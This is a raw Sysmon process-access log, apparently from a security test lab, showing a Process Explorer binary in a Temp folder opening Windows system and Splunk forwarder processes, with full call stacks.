\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792330Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792329Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792328Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792327Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792326Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792325Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792324Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792323Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792322Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792321Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792320Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792319Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792318Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792317Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792316Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792315Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792314Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792313Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 